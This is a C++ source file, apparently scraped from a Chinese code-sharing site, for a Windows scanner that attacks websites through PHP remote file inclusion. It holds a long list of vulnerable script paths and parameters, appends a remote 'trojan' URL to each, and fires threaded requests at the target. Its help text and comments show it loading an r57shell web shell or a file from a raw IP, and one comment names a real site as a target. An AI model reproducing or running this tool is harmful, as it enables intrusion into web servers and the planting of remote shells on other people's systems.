📄 phpinclude.cpp
字号:
phpurl[407]="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
phpurl[408]="protection.php?siteurl=";
phpurl[409]="htmltonuke.php?filnavn=";
phpurl[410]="mail_autocheck.php?pm_path=";
phpurl[411]="index.php?p=";
phpurl[412]="modules/4nAlbum/public/displayCategory.php?basepath=";
phpurl[413]="e107/e107_handlers/secure_img_render.php?p=";
phpurl[414]="include/new-visitor.inc.php?lvc_include_dir=";
phpurl[415]="community/modules/agendax/addevent.inc.php?agendax_path=";
phpurl[416]="library/editor/editor.php?root=";
phpurl[417]="library/lib.php?root=";
phpurl[418]="zentrack/index.php?configFile=";
phpurl[419]="pivot/modules/module_db.php?pivot_path=";
phpurl[420]="myPHPCalendar/admin.php?cal_dir=";
phpurl[421]="index.php/main.php?x=";
phpurl[422]="os/pointer.php?url=";
phpurl[423]="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
phpurl[424]="db.php?path_local=";
phpurl[425]="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
phpurl[426]="index.php?kietu[url_hit]=";
phpurl[427]="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
phpurl[428]="Sources/Packages.php?sourcedir=";
phpurl[429]="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
struct cgiurl myphp[43];
SOCKET sockfd;
SOCKADDR_IN addr;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
{
return 0;
}
addr.sin_family = AF_INET;
addr.sin_port = htons(rmt_host_port);
addr.sin_addr.s_addr = inet_addr(rmt_host);
if(connect(sockfd,(struct sockaddr *) &addr, sizeof(addr))<0)
{
printf("website is shutdown....not support scan ....\n");
return 0;
}
memset(rbuff,0,1024);
send(sockfd,"HEAD / HTTP/1.0\n\n",sizeof("HEAD / HTTP/1.0\n\n"),0);
int e;
fd_set rd;
int recvn = 0;
FD_ZERO(&rd);
FD_SET(sockfd, &rd);
for(;;)
{
tv.tv_sec = 10;
tv.tv_usec = 0;
e = select(sockfd + 1, &rd, NULL, NULL, &tv);
if(e < 0 )continue;
else break;
}
if(e > 0 && FD_ISSET(sockfd, &rd) != 0)
{
recvn = recv(sockfd,rbuff,sizeof(rbuff),0);
if(recvn <= 0)
return 0;
}
//printf("***************************>recv size(buff) = %d\n",recvn);
closesocket(sockfd);
for(int i=0;i<43;i++)
{
HANDLE Thread[10];
for(int j=0;j<10;j++)
{
myphp[j].rmt_host=rmt_host;
myphp[j].rmt_wwwhost = rmt_wwwhost;
char tmpdir[4096] = "\0";
sprintf(tmpdir,"%s%s",phpurl[i*10+j],myphptrojandir);
myphp[j].url=tmpdir;
if(vebose > 0)
{
sprintf(holetmp,"<%s> %s \n",rmt_wwwhost,tmpdir);
printf(holetmp);
}
myphp[j].n=j;
myphp[j].rmt_port = rmt_host_port;
myphp[j].vebose = vebose;
DWORD dwThreadId[10];
Thread[j] = CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)GetPhpInc, (LPVOID)&myphp[j],0,&dwThreadId[i]);
if(NULL == Thread[j])
{
printf("!! createthread %d:%ld error !!\n", i, dwThreadId[i]);
}
else
{
//printf("create thread %d:%ld ok.\n", i, dwThreadId[i]);
}
Sleep(1);
}
//WaitForMultipleObjects(10,&Thread[j],TRUE,480000);
for(int x = 0; x<10; x+=MAXIMUM_WAIT_OBJECTS)
{
int count = 10 -x > MAXIMUM_WAIT_OBJECTS ? MAXIMUM_WAIT_OBJECTS: 10 -x;
DWORD dwWait = WaitForMultipleObjects(
count ,
&Thread[x],
TRUE,
INFINITE);
printf("wait status for: %d-%d, dwWait: %ld\n",x, x+count, dwWait);
}
}
printf("scan %d vulu,find %d vulu,exit,bye,code by horse_b\n",countvulscan,findok);
return 0;
}
void helpme()
{
printf("/////////////////////www.horseb.org////////////////////////////////\n");
printf("phpinclude.exe -hwww.phpbbs.net -p80 -uhttp://www.horseb.net/r57shell.txt? -v0\n");
printf("//////////////////////www.horseb.net///////////////////////////////\n");
}
char* MyQuery(char *wwwxshellsrv,int& xwrong)
{
DNS_STATUS status;
PDNS_RECORD pDnsRecord;
PIP4_ARRAY pSrvList = NULL;
DNS_FREE_TYPE freetype ;
freetype = DnsFreeRecordListDeep;
IN_ADDR ipaddr;
char resip[50] = {0};
status = DnsQuery_A(wwwxshellsrv, DNS_TYPE_A, DNS_QUERY_ACCEPT_TRUNCATED_RESPONSE, pSrvList, &pDnsRecord, NULL);
if (status != ERROR_SUCCESS)
{
xwrong = -1;
if(!pDnsRecord)
DnsRecordListFree(pDnsRecord, freetype);
LocalFree(pSrvList);
return "0.0.0.0";
}
ipaddr.S_un.S_addr = (pDnsRecord->Data.A.IpAddress);
if( inet_ntoa(ipaddr) == NULL)
xwrong = -1; //a error
else
xwrong = 1;
DnsRecordListFree(pDnsRecord, freetype);
LocalFree(pSrvList);
return inet_ntoa(ipaddr);
}
//H:\研究\phpinclude\Release>phpinclude -hwww.linktrust.com.cn -p80 -uhttp://123.112.19.10/c2007.txt? -v1
int main(int argc,char** argv)
{
int c;
int digit_optind = 0;
char rmt_host[1024] = "\0";
char rmt_wwwhost[1024] ="\0";
int rmt_port = 0;
char myphptrojan[1024] ="\0";
int vorbose = 0;
if(argc < 5)
helpme();
while (1)
{
int this_option_optind = optind ? optind : 1;
c = getopt (argc, argv, "h:p:u:v:");
if (c == EOF)
break;
switch (c)
{
case 'h':
sprintf(rmt_wwwhost,"%s",optarg);
break;
case 'p':
try
{
rmt_port = atoi(optarg);
}
catch(...)
{
rmt_port = 80;
}
break;
case 'u':
sprintf (myphptrojan,"%s", optarg);
break;
case 'v':
try
{
vorbose = atoi(optarg);
}
catch(...)
{
vorbose = 1;
}
default:
break;
}
}
//解析网址为IP
int xwrong = -1;
strcpy(rmt_host,MyQuery(rmt_wwwhost,xwrong)); //解析出错是YJServerIP = "0.0.0.0"
if(xwrong < 0)
{
return 0;
}
WSAData GInitData;
if (WSAStartup(MAKEWORD(2,1),&GInitData) != 0)
{
printf("初始化SOCKET函数失败!\n");
return 0;
}
SaveLog("start scan ------------------------------------\r\n");
StartScan(rmt_host,rmt_wwwhost,rmt_port,myphptrojan,vorbose);
//getchar();
WSACleanup();
return (0);
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -